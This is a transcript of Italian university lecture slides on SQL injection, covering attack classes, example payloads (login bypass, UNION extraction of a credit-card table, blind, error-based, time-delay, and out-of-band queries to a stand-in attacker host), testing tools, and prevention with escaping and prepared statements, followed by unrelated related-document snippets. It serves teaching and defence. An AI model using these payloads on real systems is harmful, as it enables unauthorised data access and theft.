SQL INJECTION. Details and Prevention. Programmazione Sicura. Giuseppe Pietravalle. Giuseppe Santaniello
|
|
- Cristoforo Dini
- 8 anni fa
- Visualizzazioni
Transcript
1 SQL INJECTION Details and Prevention Giuseppe Santaniello Giuseppe Pietravalle Programmazione Sicura A.A. 2014/2015
2 OWASP Open Web Application Security Project (OWASP) è un progetto open-source per la sicurezza delle applicazioni Offre guide e consigli sulla creazione di applicazioni sicure Nel 2004 fu istituita una fondazione no-profit che supporta l'owasp E presente anche in Italia 2
3 OWASP TOP Venne pubblicata per la prima volta nel 2003 Il suo scopo principale è quello di fornire informazioni in merito alle conseguenze delle più importanti vulnerabilità di sicurezza sulle applicazioni web Mostra tecniche di base per proteggersi 3
4 OWASP TOP
5 INJECTION Si verifica quando dati non validati sono inviati come parte di un comando o di una query al loro interprete Conseguenze: esecuzione di comandi non previsti accesso a dati per i quali non si ha l autorizzazione 5
6 INJECTION 6
7 Vulnerabilità Cattiva validazione dell input: SQL Injection XSS Buffer Overflow All input is Evil Writing Secure Code - Michael Howard 7
8 SQL Injection E una tecnica di hacking utilizzata per colpire applicazioni web che si appoggiano su un DBMS Sfrutta l'inefficienza dei controlli sui dati ricevuti in input inserendo codice maligno all'interno di una query SQL Nel 2013, è stata classificata da OWASP come l attacco più utilizzato 8
9 Classi di SQL Injection Inband: i dati vengono estratti utilizzando lo stesso canale usato per iniettare il codice SQL Out-of-band: i dati vengono recuperati attraverso un canale differente (ad esempio, una ) Inferential o Blind: i dati vengono ricostruiti osservando le risposte del Server a particolari richieste 9
10 Applicazione Vulnerabile L applicazione interagisce con un DB? individuare i campi di input per la realizzazione di una query SQL in modo da generare un errore inserire un apice ( ) o un punto e virgola (;) ad un campo o ad parametro nell'url del sito spesso sono presenti pagine di errore personalizzate 10
11 Attacco Standard Si consideri la seguente query SQL: SELECT * FROM Users WHERE Username='$username' AND Password='$password' Si supponga di inserire i seguenti valori: $username = 1 or 1 = 1 $password = 1 or 1 = 1 11
12 Conseguenza Query risultante: SELECT * FROM Users WHERE Username= 1 OR 1 = 1 AND Password= 1 OR 1 = 1 Autenticazione senza conoscere le effettive credenziali di accesso 12
13 Tecniche Union Operator Boolean Error based Out-of-band Time delay 13
14 Union Operator L'operatore UNION viene utilizzato per unire una query appositamente creata a quella originale Il risultato della query contraffatta sarà affiancato al risultato di quella originale, permettendo di ottenere i valori delle colonne di altre tabelle Si consideri la seguente query: SELECT Name, Phone, Address FROM Users WHERE Id=$id 14
15 Union Operator Impostando il valore di $id in questo modo: $id=1 UNION ALL SELECT creditcardnumber,1,1 FROM CreditCardTable Si otterrà la seguente query: SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL SELECT creditcardnumber,1,1 FROM CreditCardTable Il risultato della query originale si unirà con tutti i numeri di carte di credito presenti nella tabella CreditCardTable. 15
16 Union Operator Da notare: sono stati selezionati altri due valori Motivo: le due query devono avere un numero uguale di parametri/colonne per evitare un errore di sintassi UNION ALL: permette di ottenere le righe duplicate 16
17 Union Operator Obiettivo: trovare il giusto numero di colonne da utilizzare nella SELECT Utilizzo della clausola ORDER BY seguita da un numero che indica una determinata colonna del database in questione ORDER BY
18 Union Operator La query viene eseguita con successo? 1. Si: il DB possiede 10 o più colonne 2. No: il DB possiede meno colonne Dopo aver scoperto il numero di colonne, bisogna capire il tipo di ogni colonna Si può provare ad utilizzare il valore NULL: UNION SELECT 1,null,null 18
19 Union Operator Se la query fallisce, verrà visualizzato un messaggio di errore Se, invece, la query viene eseguita con successo significa che il primo campo è di tipo intero Si procede, quindi, allo stesso modo per comprendere il tipo delle restanti colonne 19
20 Boolean Exploitation Molto utile quando ci si trova in una situazione di Blind SQL Injection Blind SQL Injection: Non si sa nulla sul risultato di un'operazione Es. lo sviluppatore ha realizzato una pagina personalizzata di errore Utilizzando metodi di inferenza è possibile superare questo ostacolo 20
21 Boolean Exploitation Con il termine Inferenza si intende una conclusione tratta da un insieme di fatti o circostanze Si eseguono alcuni test di verità sui parametri vulnerabili e, in base al risultato, si deducono i loro valori I test sono di tipo binario (true/false) E necessario distinguere il significato di vero da quello di falso 21
22 Boolean Exploitation Si supponga che ci sia un parametro vulnerabile (id) Si definisce una query sintatticamente corretta che restituisce un valore falso: SELECT field1, field2, field3 FROM Users WHERE Id='1' AND '1'='2' Il valore falso è rappresentato dal contenuto della pagina web restituita 22
23 Boolean Exploitation Obiettivo: determinare il valore di ogni singolo carattere del parametro username Inferential query: SELECT field1, field2, field3 FROM Users WHERE Id='1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1' La query restituisce un risultato se e solo se il primo carattere del campo username è uguale al valore ASCII 97 Si prosegue allo stesso modo per i restanti caratteri 23
24 Boolean Exploitation Quando bisogna terminare la procedura di inferenza? La funzione substring() restituisce NULL quando l'indice corrente è maggiore della lunghezza della stringa stessa Se il valore del carattere su cui si sta facendo inferenza è uguale a 0 allora è stata esaminata tutta la stringa. Se il valore della variabile su cui si sta facendo inferenza contiene il carattere ASCII 0? 24
25 Boolean Exploitation Soluzione: fare inferenza sulla lunghezza. Quando si incontra il carattere NULL, si va a fare inferenza sulla lunghezza della stringa E necessario memorizzare il numero di caratteri analizzati (n) La lunghezza della stringa rappresentante il valore è uguale a n? SI => fine NO => continuare a fare inferenza sul prossimo 25 carattere
26 Error based Exploitation Consiste nel forzare il database ad eseguire delle operazioni il cui risultato sarà sicuramente un errore Si cerca di estrarre delle informazioni dal database mediante il messaggio di errore dato in output Questa tecnica può essere differente per ogni DBMS 26
27 Error based Exploitation Si consideri la richiesta: La query risulterà la seguente: SELECT * FROM products WHERE id_product = $id_product 27
28 Error based Exploitation Effettuando la seguente richiesta si può provare a prelevare delle informazioni: product.php?id=10 UTL_INADDR.GET_HOST_NAME ((SELECT user FROM DUAL)) -- GET_HOST_NAME è una funzione Oracle che restituisce l hostname del parametro in input DUAL è una tabella fittizia Ogni DB Oracle possiede la propria tabella DUAL 28
29 Error based Exploitation Quando si cerca nel database un hostname dando in input alla funzione un nome utente, si ha un esito negativo: ORA : host SCOTT unknown Successivamente, si potrà manipolare il parametro passato a GET_HOST_NAME e il risultato verrà visualizzato nel messaggio d errore 29
30 Out of band Exploitation Viene utilizzata quando non si riesce a sfruttare l Error Based Exploitation technique La richiesta: \\test.attacker.com\' -- Query: SELECT * FROM products WHERE id=1; EXEC master..xp_dirtree '\\test.attacker.com\' -- 30
31 Out of band Exploitation L ultima query viene usata per ottenere la lista di tutte le cartelle E sufficiente controllare i log del server DNS e cercare informazioni su test.attacker.com Una variante di questo attacco può essere realizzata per database Oracle: SELECT * FROM products WHERE id=1 UTL_HTTP.request(' test.attacker.com/') -- 31
32 Time delay Exploitation Si cerca di rallentare il database Se quest ultimo risponde in ritardo, allora è vulnerabile ad attacchi SQL injection. Come per la OOB e la Error Based, questa tecnica cambia in base al DBMS Si consideri la seguente richiesta e la relativa query: SELECT * FROM products WHERE id_product=$id_product 32
33 Time delay Exploitation Un attaccante può effettuare la seguente richiesta: AND IF(version() like 5%, sleep(10), false )) La versione di MySQL inizia per 5? 1. Si: viene eseguita la sleep di 10 secondi 2. No: viene restituito false 33
34 Applicazioni di supporto Sono state utilizzate le seguenti web application: 1. DVWA 2. SQLI Labs 34
35 DVWA DVWA è un'applicazione web vulnerabile scritta in PHP/ MySQL aiuta i professionisti della sicurezza e gli sviluppatori web L'applicazione fornisce una lista delle vulnerabilità più comuni Permette di impostare tre livelli di sicurezza 1. low 2. medium 3. high In base al livello, viene cambiato il grado di vulnerabilità 35 dell'applicazione
36 Test DVWA 36
37 SQLi Labs E una web application vulnerabile E stata utilizzata per comprendere ed analizzare le seguenti tecniche: 1. Boolean Exploitation 2. Time Delay Exploitation 37
38 Boolean Test 38
39 Time Delay Test 39
40 Tool Automatizzano le tecniche descritte in precedenza I tool analizzati: 1. SQLmap 2. BSQL Hacker 3. SQL Power Injection 4. Pangolin 5. W3AF 6. SQLiX 40
41 SQLmap E un software open source sviluppato in Python Pieno supporto a: 1. MySQL 2. Oracle 3. PostgreSQL 4. Microsoft SQL Server 5. Microsoft Access Sfrutta le tecniche: 1. Boolean-based blind 2. Time-based blind 3. Error-based 4. UNION query 41
42 BSQL Hacker E un tool finalizzato a condurre penetration testing ed include la verifica di vulnerabilità di tipo SQL Injection. Presente interfaccia grafica DBMS supportati: 1. Oracle 2. MySQL 3. MSSQL Sfrutta le tecniche: 1. Blind-based 2. Error-based 42
43 SQL Power Injection E un'applicazione creata in.net 1.1 E possibile utilizzarlo con qualsiasi DBMS esistente quando si utilizza l injection inline Possiede un browser interno Plugin per Firefox 43
44 Pangolin E un tool di penetration testing sviluppato da NOSEC E disponibile una versione full function per 15 giorni Pieno supporto a: 1. MySQL 2. Oracle 3. PostgreSQL 4. Microsoft SQL Server 5. PostgreSQL 6. 44
45 W3af E un applicazione open source finalizzato al security testing di web application Prevede due modalità di utilizzo: mediante interfaccia grafica; mediante istruzioni a linea di comando. Possibilità di impostare profili di testing Supporta i principali DBMS Integrazione con SQLmap 45
46 SQLiX Progetto di OWASP scritto in Perl E in grado di utilizzare le tecniche più comuni e le cosiddette tecniche Blind SQL injection Supporta i DBMS: 1. MS- Access 2. MS- SQL 3. MySQL 4. Oracle 5. PostgreSQL 46
47 Confronto SQLmap BSQL Hacker SQL PI Pangolin W3af SQLiX 47
48 Conclusioni I tool sono stati analizzati sulle seguenti applicazioni vulnerabili: 1. DVWA 2. SQLi labs 3. Nostra web application 4. (Acunetix) Motivo: Operare in assoluta sicurezza e nel rispetto della legge 48
49 Come difendersi Non esiste una soluzione assoluta e portabile allo stesso tempo A seconda dei casi è possibile adottare diverse strategie: 1. Controlli sul tipo di dato 2. Creazione di filtri tramite espressioni regolari 3. Eliminazione di caratteri potenzialmente dannosi 4. Escape di caratteri potenzialmente dannosi 5. Prepared statement 6. Utilizzo di apposite API 49
50 Controlli sul tipo di dato Il type casting è un operazione che forza una variabile ad essere valutata come appartenente ad un certo tipo Esempio: $id = (int) $_GET['id']; $sql = SELECT * from articoli WHERE id=$id ; $id avrà sicuramente un valore intero Può essere eseguito anche mediante: settype(), intval() Si può effettuare un check mediante: is_numeric(), is_int(),gettype() 50
51 Espressioni regolari E una sequenza di simboli che identifica un insieme di stringhe preg_match() in PHP : if (preg_match( /^[a-z0-9]{4,12}$/i, $login)) { // ok } else { // errore } 51
52 Eliminare caratteri pericolosi Si può decidere di eliminare eventuali caratteri pericolosi: apice, doppio apice, punto e virgola, ecc Esempio: $input = Paperon de Paperoni ; $output = str_replace(,, $input); $output = Paperon de Paperoni ; Questo tipo di approccio può risultare difficile da applicare 52
53 Escape delle stringhe Utilizzo di specifiche funzioni per l escape di particolari caratteri Esempio: $username=admin e $password=1 or 1 = 1 $query = sprintf("select * FROM users WHERE username = '%s' AND password =%s';", mysqli_real_escape_string($connection, $username), mysqli_real_escape_string($connection, $password)); La query diventa: SELECT * FROM users WHERE username = 'admin' AND password = '1\' OR 53\'1\'=\'1';
54 Prepared Statement Si divide in tre fasi: 1. Prepare 2. Parse e Compile 3. Execute 54
55 Prepared Statement Esempio $record_id = 5; $pst = $mysqli->prepare("select nome, cognome FROM agenda WHERE record_id =?"); $pst->bind_param('i', $record_id); $pst->execute(); Viene separata la logica dell SQL dal dataset 55
56 API Free Verifier Si basa sul protocollo SMTP { "authentication_status":1,"limit_status":0,"limit_desc":"not Limited","verify_status":1,"verify_status_desc":"MX record about gmail.com exists.connection succeeded to alt1.gmail-smtp-in.l.google.com SMTP.220 mx.google.com ESMTP mq18si vdb.57 - gsmtp\n> HELO verify- .org 250 mx.google.com at your service\n> MAIL FROM: check@verify- .org = OK mq18si vdb.57 - gsmtp\n> RCPT TO: gi.santaniello@gmail.com = OK mq18si vdb gsmtp\n" }
--- PREMESSE INTRODUZIONE. .:luxx:.
SQL INJECTION --- SICUREZZA.:luxx:. PREMESSE Questa guida accenna ad alcuni metodi di SQL injection e si sofferma sulla prevenzione di tali attacchi, per comprendere al meglio il testo è necessaria una
DettagliCorso di Sicurezza Informatica. Sicurezza del software. Ing. Gianluca Caminiti
Corso di Sicurezza Informatica Sicurezza del software Ing. Gianluca Caminiti SQL Injection Sommario Premessa sul funzionamento dei siti dinamici SQL Injection: Overview Scenari di attacco: Errata gestione
DettagliProgrammazione Web. Laboratorio 4: PHP e MySQL
Programmazione Web Laboratorio 4: PHP e MySQL Lavagna elettronica (I) Un unità aziendale di decision making opera per le decisioni di tipo consueto e ripetitivo tramite la procedura seguente: un qualsiasi
DettagliUso delle basi di dati DBMS. Cos è un database. DataBase. Esempi di database
Uso delle basi di dati Uso delle Basi di Dati Il modulo richiede che il candidato comprenda il concetto di base dati (database) e dimostri di possedere competenza nel suo utilizzo. Cosa è un database,
DettagliDispensa di database Access
Dispensa di database Access Indice: Database come tabelle; fogli di lavoro e tabelle...2 Database con più tabelle; relazioni tra tabelle...2 Motore di database, complessità di un database; concetto di
DettagliData Base. Master "Bio Info" Reti e Basi di Dati Lezione 6
Data Base 1 Sommario I concetti fondamentali. Database Relazionale.. Query e SQL MySql, Creazione di un db in MySQL con PHPmyAdmin Creazione database e delle Tabelle Query Inserimento Ricerca Modifica
DettagliDBMS. Esempi di database. DataBase. Alcuni esempi di DBMS DBMS. (DataBase Management System)
(DataBase Management System) Sistemi di ges3one di basi di da3 Un Database Management System è un sistema software progettato per consentire la creazione e manipolazione efficiente di database (collezioni
DettagliSQL Injection: i 5 migliori tool per individuarle
SQL Injection: i 5 migliori tool per individuarle SQL Injection è la principale tecnica sfruttata per colpire una applicazione web basata su un database di tipo SQL, potrebbe consentire ad un malintenzionato
DettagliREOL-Services Quick Reference Ver. 1.1 Tecno Press Srl. 1
In questa semplice guida sono riportate tutte le informazioni relative alla prima registrazione e quelle relative alla configurazione dell ambiente di lavoro per poter utilizzare al meglio la nostra suite
DettagliObiettivi d esame PHP Developer Fundamentals on MySQL Environment
Obiettivi d esame PHP Developer Fundamentals on MySQL Environment 1.0 Ambiente di sviluppo 1.1 Web server e database MySQL Comprendere la definizione dei processi che si occupano di fornire i servizi web
DettagliProgetto ittorario Anno scol. 2013-2014
PROGETTO ittorario Scopo: Creazione di una pagina web che mostri l orario di un docente, della classe della materia o dell aula a discrezione dell utente. Sviluppatori: Progetto sviluppato dalla classe
DettagliRELAZIONE PROGETTO DATABASE GESTIONE BIBLIOTECA PERSONALE
RELAZIONE PROGETTO DATABASE GESTIONE BIBLIOTECA PERSONALE Mameli Salvatore-M01/000153 SOMMARIO 1 INTRODUZIONE 1.1 Project Overview 1.2 Ambiente del prodotto 1.3 Document Overview 2 - PROGETTAZIONE 2.1
Dettagli[1] Cross Site Scripting [2] Remote / Local File Inclusion [3] SQL Injection
---------------------------------------------------------------------..... _/ / _ / / \ \/ / / / / \ / \ \ \ / /_/ \ /\ / \ \ \ / /_/ > Y \ \ \ >\_/ / > / \ / / \/ \/ \/ \/ / / \/ ---------------------------------------------------------------------
DettagliSincronizzazione degli utenti. Archiviazione di singole caselle di posta
Archiviazione delle email con IceWarp Mail Server Si prega di notare che questo tutorial copre solo le specifiche di archiviazione di un server di IceWarp. Si presume che si disponga già di un installazione
DettagliSistemi per la gestione di database: MySQL ( )
Sistemi per la gestione di database: MySQL ( ) Relational Database e Relational Database Management System Un database è una raccolta di dati organizzata in modo da consentire l accesso, il reperimento
DettagliMySQL Database Management System
MySQL Database Management System http://www.mysql.com/ DATABASE RELAZIONALI Un database è una collezione strutturata di informazioni. I database sono delle strutture nelle quali è possibile memorizzare
DettagliIl linguaggio SQL. è di fatto lo standard tra i linguaggi per la gestione di data base relazionali.
(Structured Query Language) : Il linguaggio è di fatto lo standard tra i linguaggi per la gestione di data base relazionali. prima versione IBM alla fine degli anni '70 per un prototipo di ricerca (System
Dettagli19. LA PROGRAMMAZIONE LATO SERVER
19. LA PROGRAMMAZIONE LATO SERVER Introduciamo uno pseudocodice lato server che chiameremo Pserv che utilizzeremo come al solito per introdurre le problematiche da affrontare, indipendentemente dagli specifici
DettagliLezione 9. Applicazioni tradizionali
Lezione 9 Applicazioni tradizionali Pag.1 Sommario Concetti trattati in questa lezione: SQL nel codice applicativo Cursori API native ODBC Pag.2 SQL nel codice applicativo I comandi SQL possono essere
DettagliSINTESI. Comunicazioni Obbligatorie [COB] Import massivo XML. ver. 1.0 del 14.05.2008 (ver. COB 3.13.01)
SINTESI Comunicazioni Obbligatorie [COB] XML ver. 1.0 del 14.05.2008 (ver. COB 3.13.01) Questo documento è una guida alla importazione delle Comunicazioni Obbligatorie: funzionalità che consente di importare
DettagliManuale d utilizzo della componente di console di monitoraggio
Pag. 1 di 12 MANUALE DI UTILIZZO DELLA COMPONENTE DI MONITORAGGIO DEL SISTEMA SOFTWARE PAGAMENTO DEI TICKET VIA WEB CON CARTA DI CREDITO INDICE 1 INTRODUZIONE... 1 1.1 GLOSSARIO... 1 1.2 GLI UTENTI DELL
DettagliLavorare con MySQL Parte Seconda.
Lavorare con MySQL Parte Seconda. PHP, dalla versione 4.0, usufruisce difunzioni native per colloquiare con MySQL, senza appoggiarsi ad alcuna libreria o modulo esterno. In questa lezione verranno esaminate
DettagliArchiviazione Email con Kerio Connect
Archiviazione Email con Kerio Connect Si prega di notare che questo tutorial copre solo le specifiche di archiviazione di un server di Kerio Connect (ex Kerio MailServer). Si presume che si disponga già
DettagliLe Basi di Dati. Le Basi di Dati
Le Basi di Dati 20/05/02 Prof. Carlo Blundo 1 Le Basi di Dati Le Base di Dati (database) sono un insieme di tabelle di dati strutturate in maniera da favorire la ricerca di informazioni specializzate per
DettagliGuida all accesso al portale e ai servizi self service
Guida all accesso al portale e ai servizi self service INDICE PREMESSA 2 pag. 1 INTRODUZIONE 2 2 MODALITÀ DI PRIMO ACCESSO 2 2.1 LA CONVALIDA DELL INDIRIZZO DI POSTA ELETTRONICA 2 2.2 L INSERIMENTO DELLA
DettagliApplicazione JobScheduler su DB SQL Milano, lì 14/09/2009
Documentazione KING Applicazione JobScheduler su DB SQL Milano, lì 14/09/2009 Microsoft SQL Server dispone del servizio di Job Scheduler, o Schedulatore di attività: si tratta di un applicativo che consente
DettagliOSSIF WEB. Manuale query builder
OSSIF WEB Manuale query builder - Maggio 2010 1) Sommario 1) SOMMARIO... 2 INTRODUZIONE... 3 Scopo del documento... 3 Struttura del documento... 3 Descrizione dell interfaccia grafica... 3 SELEZIONE DI
DettagliSurfCop. Informazioni sul prodotto
SurfCop Informazioni sul prodotto Contenuto Introduzione... 3 Funzioni del programma... 3 Vantaggi del programma... 3 Funzionalità del programma... 4 Requisiti di sistema:... 4 Come funziona il programma...
DettagliTeamPortal. Infrastruttura
TeamPortal Infrastruttura 05/2013 TeamPortal Infrastruttura Rubriche e Contatti Bacheca Procedure Gestionali Etc Framework TeamPortal Python SQL Wrapper Apache/SSL PostgreSQL Sistema Operativo TeamPortal
DettagliIstruzioni SQL 1. Query di selezione 2 Istruzione SELECT 2 Istruzione SELECT DISTINCT 2 ORDER BY 3 WHERE 3 La condizione LIKE 4 BETWEEN AND 5
Istruzioni SQL Istruzioni SQL 1 Query di selezione 2 Istruzione SELECT 2 Istruzione SELECT DISTINCT 2 ORDER BY 3 WHERE 3 La condizione LIKE 4 BETWEEN AND 5 Query di inserimento 5 INSERT INTO 5 Query di
DettagliInstallazione di GFI Network Server Monitor
Installazione di GFI Network Server Monitor Requisiti di sistema I computer che eseguono GFI Network Server Monitor richiedono: i sistemi operativi Windows 2000 (SP4 o superiore), 2003 o XP Pro Windows
DettagliL amministratore di dominio
L amministratore di dominio Netbuilder consente ai suoi clienti di gestire autonomamente le caselle del proprio dominio nel rispetto dei vincoli contrattuali. Ciò è reso possibile dall esistenza di un
DettagliLe query. Lezione 6 a cura di Maria Novella Mosciatti
Lezione 6 a cura di Maria Novella Mosciatti Le query Le query sono oggetti del DB che consentono di visualizzare, modificare e analizzare i dati in modi diversi. Si possono utilizzare query come origine
DettagliCostruzione di Sit Web con PHP e MySQL. Lezione 7 - Esercitazione - Introduzione a MySQL: le tabelle, i tpi di dato, le query
Costruzione di Sit Web con PHP e MySQL Lezione 7 - Esercitazione - Introduzione a MySQL: le tabelle, i tpi di dato, le query Esercitazione In questa lezione si farà insieme una seconda esercitazione che
DettagliPSNET UC RUPAR PIEMONTE MANUALE OPERATIVO
Pag. 1 di 17 VERIFICHE E APPROVAZIONI VERSIONE V01 REDAZIONE CONTROLLO APPROVAZIONE AUTORIZZAZIONE EMISSIONE NOME DATA NOME DATA NOME DATA PRATESI STATO DELLE VARIAZIONI VERSIONE PARAGRAFO O DESCRIZIONE
DettagliSistema Informativo Gestione Fidelizzazione Clienti MANUALE D USO
Sistema Informativo Gestione Fidelizzazione Clienti MANUALE D USO Login All apertura il programma controlla che sia stata effettuata la registrazione e in caso negativo viene visualizzato un messaggio.
DettagliCorso sul linguaggio SQL
Corso sul linguaggio SQL Modulo L2B (SQL) 2.1 Comandi sui database 1 Prerequisiti Introduzione ai DB Linguaggi per database Tipi fondamentali di dati 2 1 Introduzione In questa Unità introduciamo il linguaggio
DettagliACCESSO AL SISTEMA HELIOS...
Manuale Utente (Gestione Formazione) Versione 2.0.2 SOMMARIO 1. PREMESSA... 3 2. ACCESSO AL SISTEMA HELIOS... 4 2.1. Pagina Iniziale... 6 3. CARICAMENTO ORE FORMAZIONE GENERALE... 9 3.1. RECUPERO MODELLO
DettagliLa prima tabella da creare è quella relativa all elenco delle modalità mediante le quali è possibile identificare la corrispondenza (Posta
Diamo ordine all ufficio protocollo a cura della redazione OFFICE MAGAZINE Come sostituire il registro cartaceo dedicato alla gestione della corrispondenza in entrata e in uscita delle aziende e degli
DettagliMANUALE UTENTE Fiscali Free
MANUALE UTENTE Fiscali Free Le informazioni contenute in questa pubblicazione sono soggette a modifiche da parte della ComputerNetRimini. Il software descritto in questa pubblicazione viene rilasciato
DettagliCorso di Laboratorio di Basi di Dati
Corso di Laboratorio di Basi di Dati F1I072 - INF/01 a.a 2009/2010 Pierluigi Pierini Technolabs S.p.a. Pierluigi.Pierini@technolabs.it Università degli Studi di L Aquila Dipartimento di Informatica Technolabs
DettagliIntroduzione ai Sistemi di Gestione di Basi di Dati XML
Introduzione ai Sistemi di Gestione di Basi di Dati Introduzione ai Sistemi di Gestione di Basi di Dati Obiettivi Memorizzare ed estrarre documenti da RDBMS. Trasformare dati tabellari in dati e viceversa.
DettagliGestione Accessi Web
L architettura del software Gestione Accessi Web prevede tre unità principali interfacciate fra loro: il WEB server su cui va in esecuzione l applicativo, il database di riferimento e il modulo di comunicazione
DettagliSistema Gestionale FIPRO. Dott. Enea Belloni Ing. Andrea Montagnani
Sistema Gestionale FIPRO Dott. Enea Belloni Ing. Andrea Montagnani Firenze, 29 Aprile 2010 Sommario della presentazione Il sistema informatico per la gestione progetti FIPRO L utente presentatore: diritti
DettagliLA GESTIONE DELLE VISITE CLIENTI VIA WEB
LA GESTIONE DELLE VISITE CLIENTI VIA WEB L applicazione realizzata ha lo scopo di consentire agli agenti l inserimento via web dei dati relativi alle visite effettuate alla clientela. I requisiti informatici
DettagliMon Ami 3000 Varianti articolo Gestione di varianti articoli
Prerequisiti Mon Ami 3000 Varianti articolo Gestione di varianti articoli L opzione Varianti articolo è disponibile per le versioni Azienda Light e Azienda Pro e include tre funzionalità distinte: 1. Gestione
DettagliAccess. P a r t e p r i m a
Access P a r t e p r i m a 1 Esempio di gestione di database con MS Access 2 Cosa è Access? Access e un DBMS che permette di progettare e utilizzare DB relazionali Un DB Access e basato sui concetti di
DettagliChe cos'è un modulo? pulsanti di opzione caselle di controllo caselle di riepilogo
Creazione di moduli Creazione di moduli Che cos'è un modulo? Un elenco di domande accompagnato da aree in cui è possibile scrivere le risposte, selezionare opzioni. Il modulo di un sito Web viene utilizzato
DettagliI file di dati. Unità didattica D1 1
I file di dati Unità didattica D1 1 1) I file sequenziali Utili per la memorizzazione di informazioni testuali Si tratta di strutture organizzate per righe e non per record Non sono adatte per grandi quantità
DettagliApprofondimenti. Il controllo di SQL Injection nelle pagine ASP e ASP.NET. U.A. 5 - Database in rete con le pagine ASP e ASP.
U.A. 5 - Database in rete con le pagine ASP e ASP.NET 269 Il controllo di SQL Injection nelle pagine ASP e ASP.NET Approfondimenti Con il termine SQL Injection si intende l aggiunta di istruzioni SQL nell
DettagliGuida all Installazione del ProxyFatturaPA
i Guida all Installazione del ii Copyright 2005-2014 Link.it srl iii Indice 1 Introduzione 1 2 Fase Preliminare 1 3 Esecuzione dell Installer 1 4 Fase di Dispiegamento 5 4.1 JBoss 5.x e 6.x....................................................
Dettaglideveloped by Emanuele De Carlo
developed by Emanuele De Carlo WorkGym è un Software sviluppato in JAVA pensato per migliorare la gestione di piccole e grandi palestre. Il suo principale scopo è quello di mantenere un DataBase contenente
DettagliEsercitazione 4 JDBC
JDBC Obiettivi dell esercitazione Familiarizzare con l'organizzazione dell'ambiente di lavoro per la realizzazione di applicazioni Java Utilizzare i costrutti di base della libreria JDBC per 1. la gestione
DettagliALICE AMMINISTRAZIONE UTENTI WEB
AMMINISTRAZIONE UTENTI WEB REL. 1.2 edizione luglio 2008 INDICE 1. AMMINISTRAZIONE DI UTENTI E PROFILI... 2 2. DEFINIZIONE UTENTI... 2 2.1. Definizione Utenti interna all applicativo... 2 2.1.1. Creazione
DettagliManuale di utilizzo del sito ASUWEB
Manuale di utilizzo del sito ASUWEB Versione 1.0 maggio 2007 1. Introduzione:... 3 2. Come registrarsi:... 3 3. I diversi livelli di abilitazione degli utenti:... 5 4. UTENTI IN SOLA LETTURA... 5 4.1.
DettagliSPSS Statistics per Windows - Istruzioni di installazione per (Licenza per utenti singoli)
SPSS Statistics per Windows - Istruzioni di installazione per (Licenza per utenti singoli) Le seguenti istruzioni sono relative all installazione di SPSS Statistics con licenza per utenti singoli. Una
DettagliDirezione Centrale per le Politiche dell Immigrazione e dell Asilo
Direzione Centrale per le Politiche dell Immigrazione e dell Asilo Sistema inoltro telematico domande di nulla osta, ricongiungimento e conversioni Manuale utente Versione 2 Data creazione 02/11/2007 12.14.00
DettagliGUIDA UTENTE MONEY TRANSFER MANAGER
GUIDA UTENTE MONEY TRANSFER MANAGER (vers. 1.0.2) GUIDA UTENTE MONEY TRANSFER MANAGER (vers. 1.0.2)... 1 Installazione... 2 Prima esecuzione... 5 Login... 7 Funzionalità... 8 Anagrafica... 9 Registrazione
DettagliManuale Utente Albo Pretorio GA
Manuale Utente Albo Pretorio GA IDENTIFICATIVO DOCUMENTO MU_ALBOPRETORIO-GA_1.4 Versione 1.4 Data edizione 04.04.2013 1 TABELLA DELLE VERSIONI Versione Data Paragrafo Descrizione delle modifiche apportate
DettagliManuale LiveBox WEB ADMIN. http://www.liveboxcloud.com
2014 Manuale LiveBox WEB ADMIN http://www.liveboxcloud.com LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia espressa
Dettaglie/fiscali - Rel. 03.03.03 e/fiscali Installazione
e/fiscali - Rel. 03.03.03 e/fiscali Installazione INDICE 1 REQUISITI... 3 1.1.1 Requisiti applicativi... 3 2 PROCEDURA DI INSTALLAZIONE... 4 2.0.1 Versione fix scaricabile dal sito... 4 2.1 INSTALLAZIONE...
DettagliMANUALE UTENTE Profilo Azienda Partecipata. APPLICATIVO CAFWeb
MANUALE UTENTE Profilo Azienda Partecipata APPLICATIVO CAFWeb CAF_ManualeUtente_Partecipate_2.0.doc Pag. 1 di 17 Sommario 1 GENERALITÀ... 3 1.1 Scopo... 3 1.2 Validità... 3 1.3 Riferimenti... 3 1.4 Definizioni
DettagliCapitolo 13. Interrogare una base di dati
Capitolo 13 Interrogare una base di dati Il database fisico La ridondanza è una cosa molto, molto, molto brutta Non si devono mai replicare informazioni scrivendole in più posti diversi nel database Per
DettagliCONCETTO DI ANNIDAMENTO
LEZIONE14 SQL ANNIDAMENTI PAG. 1 / 5 PROF. ANDREA ZOCCHEDDU LEZIONE14 SQL ANNIDAMENTI CONCETTO DI ANNIDAMENTO LINGUAGGIO SQL QUERY ANNIDATE Per annidamento si intende la possibilità che, all interno di
DettagliFunzioni non documentate Openoffice.org. 3 Base mini-howto
Funzioni non documentate Openoffice.org. 3 Base mini-howto Augusto Scatolini (webmaster@comunecampagnano.it) Ver. 1.0 gennaio 2009 Come risolvere il problema del contatore che inizia da 0 (zero) Come importare
DettagliAvvisi di addebito/cartelle di pagamento: domanda di emissione provvedimenti
Avvisi di addebito/cartelle di pagamento: domanda di emissione provvedimenti MANUALE UTENTE Versione procedura 2.0 Avvisi di addebito/cartelle di Pagamento: domanda di emissione provvedimenti: versione
DettagliProgetto di Ingegneria del Software 2. SWIMv2
Progetto di Ingegneria del Software 2 2012/2013 SWIMv2 Guida al Testing Docente: Prof. Luca Mottola Davide Brambilla Antonio Caputo Paolo Caputo 1 Indice 1 Introduzione 1.1 Materiale fornito................................
DettagliIstruzioni e regole del servizio 3D Secure. Allegato tecnico e-commerce
Istruzioni e regole del servizio 3D Secure Allegato tecnico e-commerce INDICE 1 Introduzione 2 2 Funzionamento del servizio 3D Secure 2 3 Protocollo 3D Secure: Verified by Visa/SecureCode MasterCard 3
Dettaglipenetration test (ipotesi di sviluppo)
penetration test (ipotesi di sviluppo) 1 Oggetto... 3 2 Premesse... 3 3 Attività svolte durante l analisi... 3 3.1 Ricerca delle vulnerabilità nei sistemi... 4 3.2 Ricerca delle vulnerabilità nelle applicazioni
DettagliVolumi di riferimento
Simulazione seconda prova Esame di Stato Gestione di un centro agroalimentare all ingrosso Parte prima) Un nuovo centro agroalimentare all'ingrosso intende realizzare una base di dati per l'attività di
DettagliLaboratorio Progettazione Web PHP e MySQL - Lezione 9. Andrea Marchetti IIT-CNR andrea.marchetti@iit.cnr.ita 2012/2013
